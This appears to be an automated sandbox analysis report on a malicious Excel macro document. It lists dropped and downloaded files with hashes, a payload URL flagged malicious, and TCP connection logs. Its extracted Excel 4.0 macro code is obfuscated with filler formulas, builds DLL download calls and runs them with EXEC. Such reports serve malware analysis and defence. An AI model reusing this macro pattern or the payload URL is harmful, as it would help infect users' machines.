Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 8854 |
Entropy (8bit): | 7.949751503848125 |
Encrypted: | false |
SSDEEP: | 192:VS+uZNogNC+NXtYvselFpeBnmMYCft0gVaSgZTaG+3uWYvVZmSGQ9pFT+x5ylxvr:03CbJ+mMYCmgUrNaB3uzvPm1UpFimlxj |
MD5: | 780FD0ABF9055E2D8FA1BAB6D4B9163E |
SHA1: | CFCD5C73C9C517161DEC8D4B01ABFCA4B272AEBE |
SHA-256: | 6A3CDBFDB8911742673C2882E912369BC525A7BD41C9B6EFC5C9A84DAFF6C3B2 |
SHA-512: | 8359AF512FA5771EB542B1A854F15E74555C7E1F956924520AC6CEBBAE1322D27AC8FBDD390275C5A31223613986B0CBF5871A406CA2DDBB996B9EB7A94E871A |
Malicious: | false |
Reputation: | moderate, very likely benign file |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | downloaded |
Size (bytes): | 186502 |
Entropy (8bit): | 6.182486294134606 |
Encrypted: | false |
SSDEEP: | 1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo |
MD5: | E5726F9CD266AB1E58D53B6AE7C2BD5B |
SHA1: | C3CB80D45C8953E258F5DB8359EDC1E7042F1899 |
SHA-256: | 71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06 |
SHA-512: | 2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313 |
Malicious: | true |
Joe Sandbox View: |
|
Reputation: | low |
IE Cache URL: | https://shalombaptistchapel.com/ds/0604.gif |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 97555 |
Entropy (8bit): | 7.8783511704627704 |
Encrypted: | false |
SSDEEP: | 1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfAw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mz |
MD5: | DB2160DFC0FABA36852E1AD4EC8CCED9 |
SHA1: | 0E83F3FC5EFFE7E0DAABC903FADB31DABD221911 |
SHA-256: | 02D771F643F5684ECB0788F4A8E55750CB061B1E1675D6637EFB8E44731032B4 |
SHA-512: | 19B7C1D3C4D74F60C14D15AF29A54F24AA6D09B5DEE653B769AA5746094C4FB7AEDD29B7F400B6AA8A5ACE43B48E9EC8D45F90038646C1D7257B8E40BCD11EA5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 909 |
Entropy (8bit): | 4.676195772667924 |
Encrypted: | false |
SSDEEP: | 12:8NNcJRUxBv6CHiEWwGXI2DWE+W+jA0/y1bDyDLkeGLkeM4t2Y+xIBjKZm:8NQWBdW9YYWjA0KJDyp7aB6m |
MD5: | 0B8D1A9E36797016121FE0C0EA87A20A |
SHA1: | B97A34B6446FFC6EB2224948F73AEE6E5C986A78 |
SHA-256: | 8364D1052334177E19C922E62D47D6148E47F5C380B533FF8B99D863AC73E3BE |
SHA-512: | E6ED65049C0E705041E08047742058A22B33C2C66AA30ED287DF851BC367D0FCA3D337E29E2A1E86DF5CDEE8147CD5F8518878281683787BC99CEE476BADA6EE |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 2220 |
Entropy (8bit): | 4.7306633277800225 |
Encrypted: | false |
SSDEEP: | 48:8gLW9ZWAqEPKYq8B6pgLW9ZWAqEPKYq8B6:8ruAWYBKruAWYB |
MD5: | 931DD1FBEE0FA37003D23670FF803474 |
SHA1: | 356E46DD8704A2D60567255668FD08A219DD2D31 |
SHA-256: | 76D858C1C07A6F6C01D08D2EFFF68CFB1D400F6ADAA1921F64C8C9DF186C368D |
SHA-512: | 96B86C69E3E24B0D82E5A38C16944DAF1A31D06CA44B0915A221E3AE8E04DE0E200DD3B121ADF64A7932CCC902A07DE0BA2B27D863BAE04DE5EDC4647A3D2796 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 112 |
Entropy (8bit): | 4.640181681444124 |
Encrypted: | false |
SSDEEP: | 3:oyBVomxWKS9LR8RyUZELR8RyUmxWKS9LR8RyUv:dj49L6ZEL6N9L6v |
MD5: | B0563079CDA1FDF6A5226553A994DAA1 |
SHA1: | 54E2C87E0E6094ACA9C68AE8693EBD018E48DF3E |
SHA-256: | 1085EA2B0429C2167666256B8D1676C3D78E630BAC5D2C436B9F0AA575359A47 |
SHA-512: | 3E551CF9BA78AFF3713BB0C4B6167C5EB54A3EB8FD0A758248059030163929F20B11B481F3FFC6A8932DDCF0085765B521BF5C4E462286CD8361ADD6F26064DA |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 22 |
Entropy (8bit): | 2.9808259362290785 |
Encrypted: | false |
SSDEEP: | 3:QAlX0Gn:QKn |
MD5: | 7962B839183642D3CDC2F9CEBDBF85CE |
SHA1: | 2BE8F6F309962ED367866F6E70668508BC814C2D |
SHA-256: | 5EB8655BA3D3E7252CA81C2B9076A791CD912872D9F0447F23F4C4AC4A6514F6 |
SHA-512: | 2C332AC29FD3FAB66DBD918D60F9BE78B589B090282ED3DBEA02C4426F6627E4AAFC4C13FBCA09EC4925EAC3ED4F8662FDF1D7FA5C9BE714F8A7B993BECB3342 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 97555 |
Entropy (8bit): | 7.8783511704627704 |
Encrypted: | false |
SSDEEP: | 1536:Sun98Sgi2stxzMRzm+62hawSEnsBjFC6QomaIRUxPLe96bGgfAw:Sun98SF2stxzMRzm+6Mtn4BC6Qdkx6Mz |
MD5: | DB2160DFC0FABA36852E1AD4EC8CCED9 |
SHA1: | 0E83F3FC5EFFE7E0DAABC903FADB31DABD221911 |
SHA-256: | 02D771F643F5684ECB0788F4A8E55750CB061B1E1675D6637EFB8E44731032B4 |
SHA-512: | 19B7C1D3C4D74F60C14D15AF29A54F24AA6D09B5DEE653B769AA5746094C4FB7AEDD29B7F400B6AA8A5ACE43B48E9EC8D45F90038646C1D7257B8E40BCD11EA5 |
Malicious: | false |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 330 |
Entropy (8bit): | 1.6081032063576088 |
Encrypted: | false |
SSDEEP: | 3:RFXI6dtBhFXI6dtt:RJZhJ1 |
MD5: | 836727206447D2C6B98C973E058460C9 |
SHA1: | D83351CF6DE78FEDE0142DE5434F9217C4F285D2 |
SHA-256: | D9BECB14EECC877F0FA39B6B6F856365CADF730B64E7FA2163965D181CC5EB41 |
SHA-512: | 7F843EDD7DC6230BF0E05BF988D25AE6188F8B22808F2C990A1E8039C0CECC25D1D101E0FDD952722FEAD538F7C7C14EEF9FD7F4B31036C3E7F79DE570CD0607 |
Malicious: | true |
Preview: |
|
Process: | C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 186502 |
Entropy (8bit): | 6.182486294134606 |
Encrypted: | false |
SSDEEP: | 1536:O65/LQ2n3qA3PSD1AWc15xX418gzMPA3MxGQk2x44XaN9QqGYwOo9:D/LQ26GPS5g1Xm1MY3+lx7oQqGnOo |
MD5: | E5726F9CD266AB1E58D53B6AE7C2BD5B |
SHA1: | C3CB80D45C8953E258F5DB8359EDC1E7042F1899 |
SHA-256: | 71C11EEA1F3BECFDD2CF15807FACD1AA555E7EBBA9116905CDBA5DB6EB4F8F06 |
SHA-512: | 2CD34F6C63254E20696A5B15DB2C95F4F7E0278F840275CCB0DE92947359C2DD3FFCDDC0A6194ED25145FBA14EE7DF6B519A68FCCC2339F8E038DBE329F2C313 |
Malicious: | true |
Joe Sandbox View: |
|
Preview: |
|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 7.878761964356076 |
TrID: |
|
File name: | documents-351331057.xlsm |
File size: | 98253 |
MD5: | 672eb871d16413c505302778d8bf1cf9 |
SHA1: | f88277af9b7f69e32b3c7cd74f8b25804933c093 |
SHA256: | 17ab700a69c80c034abefa11b191c5ef211f534442c7688256fb200d5b2f25a1 |
SHA512: | 492abf46277c12781c5e86dc838d1e5dd16206c343ec6f7e9b8a89d13485d56a1ac35642cee2257ae0652b415a30007c809d73a6a80760599ff2ace93fde5fa5 |
SSDEEP: | 1536:ZSRSI4oWt6JJwQz8jbzPmHnsBjFC6QomaIRUxPLe96bGAfe2hawpx:ZSE7oWt6Xz8jbzP0n4BC6Qdkx60WMD |
File Content Preview: | PK..........!.\lC.............[Content_Types].xml ...(......................................................................................................................................................................................................."" |
File Icon |
---|
Icon Hash: | 74ecd0e2f696908c |
Static OLE Info |
---|
General | ||
---|---|---|
Document Type: | OpenXML | |
Number of OLE Files: | 1 |
OLE File "documents-351331057.xlsm" |
---|
Indicators | |
---|---|
Has Summary Info: | |
Application Name: | |
Encrypted Document: | |
Contains Word Document Stream: | |
Contains Workbook/Book Stream: | |
Contains PowerPoint Document Stream: | |
Contains Visio Document Stream: | |
Contains ObjectPool Stream: | |
Flash Objects Count: | |
Contains VBA Macros: |
Macro 4.0 Code |
---|
"=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM23,'Doc1'!AO15&"".dll"",0,0)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM24,'Doc1'!AO15&""1""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM25,'Doc1'!AO15&""2""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM26,'Doc1'!AO15&""3""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=CALL('Doc1'!AM19&""n"",'Doc1'!AM20&""A"",'Doc1'!AM30,'Doc2'!AR84,'Doc1'!AM27,'Doc1'!AO15&""4""&"".dll"",0,0)""=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)='Doc1'!AO20()=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)=RAND()=FACT(59)=SUMXMY2(452354,45245)"
,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=""..\ghnrope""",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&AO15)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP106)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP107)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP108)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=EXEC(AM34&BP109)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)=SUMPRODUCT(4285272,727275275,7527527527,752752752,75257275275)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 9, 2021 16:50:32.277226925 CEST | 49702 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:32.296200991 CEST | 80 | 49702 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:32.296317101 CEST | 49702 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:32.297149897 CEST | 49702 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:32.359054089 CEST | 80 | 49702 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:32.695029020 CEST | 80 | 49702 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:32.695092916 CEST | 80 | 49702 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:32.695144892 CEST | 49702 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:32.695240021 CEST | 49702 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:32.695300102 CEST | 49702 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:32.715836048 CEST | 80 | 49702 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:33.007848978 CEST | 49704 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:33.028712988 CEST | 80 | 49704 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:33.028853893 CEST | 49704 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:33.029623985 CEST | 49704 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:33.091032982 CEST | 80 | 49704 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:33.410718918 CEST | 80 | 49704 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:33.410861969 CEST | 49704 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:33.410963058 CEST | 49704 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:33.410976887 CEST | 80 | 49704 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:33.411056042 CEST | 49704 | 80 | 192.168.2.5 | 8.211.4.209 |
Apr 9, 2021 16:50:33.433675051 CEST | 80 | 49704 | 8.211.4.209 | 192.168.2.5 |
Apr 9, 2021 16:50:33.437592030 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.584470987 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:33.584696054 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.585630894 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.734102011 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:33.741019964 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:33.741045952 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:33.741060972 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:33.741220951 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.741281033 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.752283096 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.908941031 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:33.909128904 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:33.909668922 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.099513054 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105336905 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105365992 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105408907 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105441093 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105469942 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105498075 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105520964 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.105530977 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.105591059 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.105598927 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.105604887 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.106039047 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.106060982 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.106084108 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.106112957 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.106141090 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.106148005 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255583048 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255652905 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255692959 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255747080 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255784035 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255788088 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255795002 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255846024 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255850077 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255887032 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255929947 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255942106 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.255949020 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.255999088 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256014109 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256036043 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256062031 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256083012 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
Apr 9, 2021 16:50:34.256108046 CEST | 49706 | 443 | 192.168.2.5 | 162.251.80.27 |
Apr 9, 2021 16:50:34.256143093 CEST | 443 | 49706 | 162.251.80.27 | 192.168.2.5 |
